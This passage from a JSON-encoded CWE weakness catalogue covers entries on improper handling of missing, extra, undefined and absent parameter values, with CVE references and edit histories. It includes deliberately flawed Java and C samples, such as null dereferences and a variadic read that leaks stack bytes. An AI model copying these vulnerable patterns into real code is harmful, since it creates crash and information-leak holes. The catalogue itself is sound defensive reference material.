intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Structure and Validity Problems"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"}]},"Notes":{"Note":[{"#text":"This entry needs more investigation. Public vulnerability research generally focuses on the manipulations that generate invalid structure, instead of the weaknesses that are exploited by those manipulations. For example, a common attack involves making a request that omits a required field, which can trigger a crash in some cases. The crash could be due to a named chain such as CWE-690 (Unchecked Return Value to NULL Pointer Dereference), but public reports rarely cover this aspect of a vulnerability.","attr":{"@_Type":"Maintenance"}},{"#text":"The validity of input could be roughly classified along \\"syntactic\\", \\"semantic\\", and \\"lexical\\" dimensions. If the specification requires that an input value should be delimited with the \\"[\\" and \\"]\\" square brackets, then any input that does not follow this specification would be syntactically invalid. If the input between the brackets is expected to be a number, but the letters \\"aaa\\" are provided, then the input is syntactically invalid. If the input is a number and enclosed in brackets, but the number is outside of the allowable range, then it is semantically invalid. The inter-relationships between these properties - and their associated weaknesses- need further exploration.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Name, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, Theoretical_Notes"}],"Previous_Entry_Name":[{"#text":"Structure and Validity Problems","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Handle Syntactically Invalid Structure","attr":{"@_Date":"2009-03-10"}}]}},"229":{"attr":{"@_ID":"229","@_Name":"Improper Handling of Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly handle when the expected number of values for parameters, fields, or arguments is not provided in input, or if those values are undefined.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Value Problems","attr":{"@_Date":"2008-04-11"}}}},"230":{"attr":{"@_ID":"230","@_Name":"Improper Handling of Missing Values","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a parameter, field, or argument name is specified, but the associated value is missing, i.e. it is empty, blank, or null.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"229","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0422","Description":"Blank Host header triggers resultant infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0422"},{"Reference":"CVE-2000-1006","Description":"Blank \\"charset\\" attribute in MIME header triggers crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1006"},{"Reference":"CVE-2004-1504","Description":"Blank parameter causes external error infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1504"},{"Reference":"CVE-2005-2053","Description":"Blank parameter causes external error infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2053"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Value Error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"}]},"Notes":{"Note":{"#text":"Some \\"crash by port scan\\" bugs are probably due to this, but lack of diagnosis makes it difficult to be certain.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Missing Value Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Missing Value","attr":{"@_Date":"2009-03-10"}}]}},"231":{"attr":{"@_ID":"231","@_Name":"Improper Handling of Extra Values","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when more values are provided than expected.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"229","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This typically occurs in situations when only one value is expected."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Value Error"}},"Notes":{"Note":{"#text":"This can overlap buffer overflows.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Extra Value Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Extra Value","attr":{"@_Date":"2009-03-10"}}]}},"232":{"attr":{"@_ID":"232","@_Name":"Improper Handling of Undefined Values","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a value is not defined or supported for the associated parameter, field, or argument name.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"229","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, an address parameter is read and trimmed of whitespace.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String address = request.getParameter(\\"address\\");address = address.trim();String updateString = \\"UPDATE shippingInfo SET address=\'?\' WHERE email=\'cwe@example.com\'\\";emailAddress = con.prepareStatement(updateString);emailAddress.setString(1, address);","xhtml:br":["","","",""]}},"Body_Text":"If the value of the address parameter is null (undefined), the servlet will throw a NullPointerException when the trim() is attempted."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2000-1003","Description":"Client crash when server returns unknown driver type.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1003"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Undefined Value Error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Undefined Value Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Undefined Value","attr":{"@_Date":"2009-03-10"}}]}},"233":{"attr":{"@_ID":"233","@_Name":"Improper Handling of Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly handle when the expected number of parameters, fields, or arguments is not provided in input, or if those parameters are undefined.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Parameter Problems"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"39"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Parameter Problems","attr":{"@_Date":"2013-07-17"}}}},"234":{"attr":{"@_ID":"234","@_Name":"Failure to Handle Missing Parameter","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If too few arguments are sent to a function, the function will still pop the expected number of arguments from the stack. Potentially, a variable number of arguments could be exhausted in a function as well.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"233","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program if function parameter list is exhausted."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Potentially a program could fail if it needs more arguments then are available."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Build and Compilation","Description":"This issue can be simply combated with the use of proper build process."},{"Phase":"Implementation","Description":"Forward declare all functions. This is the recommended solution. Properly forward declaration of all used functions will result in a compiler error if too few arguments are sent to a function."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"foo_funct(one, two);void foo_funct(int one, int two, int three) {}","xhtml:br":["",""],"xhtml:div":{"#text":"printf(\\"1) %d\\\\n2) %d\\\\n3) %d\\\\n\\", one, two, three);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void some_function(int foo, ...) {}int main(int argc, char *argv[]) {}","xhtml:div":[{"#text":"int a[3], i;va_list ap;va_start(ap, foo);for (i = 0; i &lt; sizeof(a) / sizeof(int); i++) a[i] = va_arg(ap, int);va_end(ap);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"some_function(17, 42);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}],"Body_Text":"This can be exploited to disclose information with no work whatsoever. In fact, each time this function is run, it will print out the next 4 bytes on the stack after the two numbers sent to it."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0276","Description":"Server earlier allows remote attackers to cause a denial of service (crash) via an HTTP request with a sequence of \\"%\\" characters and a missing Host field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0276"},{"Reference":"CVE-2002-1488","Description":"Chat client allows remote malicious IRC servers to cause a denial of service (crash) via a PART message with (1) a missing channel or (2) a channel that the user is not in.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1488"},{"Reference":"CVE-2002-1169","Description":"Proxy allows remote attackers to cause a denial of service (crash) via an HTTP request to helpout.exe with a missing HTTP version numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1169"},{"Reference":"CVE-2000-0521","Description":"Web server allows disclosure of CGI source code via an HTTP request without the version number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0521"},{"Reference":"CVE-2001-0590","Description":"Application server allows a remote attacker to read the source code to arbitrary \'jsp\' files via a malformed URL request which does not end with an HTTP protocol specification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0590"},{"Reference":"CVE-2003-0239","Description":"Chat software allows remote attackers to cause a denial of service via malformed GIF89a headers that do not contain a GCT (Global Color Table) or an LCT (Local Color Table) after an Image Descriptor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0239"},{"Reference":"CVE-2002-1023","Description":"Server allows remote attackers to cause a denial of service (crash) via an HTTP GET request without a URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1023"},{"Reference":"CVE-2002-1236","Description":"CGI crashes when called without any arguments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1236"},{"Reference":"CVE-2003-0422","Description":"CGI crashes when called without any arguments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0422"},{"Reference":"CVE-2002-1531","Description":"Crash in HTTP request without a Content-Length field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1531"},{"Reference":"CVE-2002-1077","Description":"Crash in HTTP request without a Content-Length field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1077"},{"Reference":"CVE-2002-1358","Description":"Empty elements/strings in protocol test suite affect many SSH2 servers/clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1358"},{"Reference":"CVE-2003-0477","Description":"FTP server crashes in PORT command without an argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0477"},{"Reference":"CVE-2002-0107","Description":"Resultant infoleak in web server via GET requests without HTTP/1.0 version string.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0107"},{"Reference":"CVE-2002-0596","Description":"GET request with empty parameter leads to error message infoleak (path disclosure).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0596"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Parameter Error"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Missing parameter"}]},"Notes":{"Note":{"#text":"This entry will be deprecated in a future version of CWE. The term \\"missing parameter\\" was used in both PLOVER and CLASP, with completely different meanings. However, data from both taxonomies was merged into this entry. In PLOVER, it was meant to cover malformed inputs that do not contain required parameters, such as a missing parameter in a CGI request. This entry\'s observed examples and classification came from PLOVER. However, the description, demonstrative example, and other information are derived from CLASP. They are related to an incorrect number of function arguments, which is already covered by CWE-685.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-09","Modification_Importance":"Critical","Modification_Comment":"added maintenance note: this entry will probably be deprecated"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Missing Parameter Error","attr":{"@_Date":"2008-04-11"}}}},"235":{"attr":{"@_ID":"235","@_Name":"Improper Handling of Extra Parameters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when the number of parameters, fields, or arguments with the same name exceeds the expected 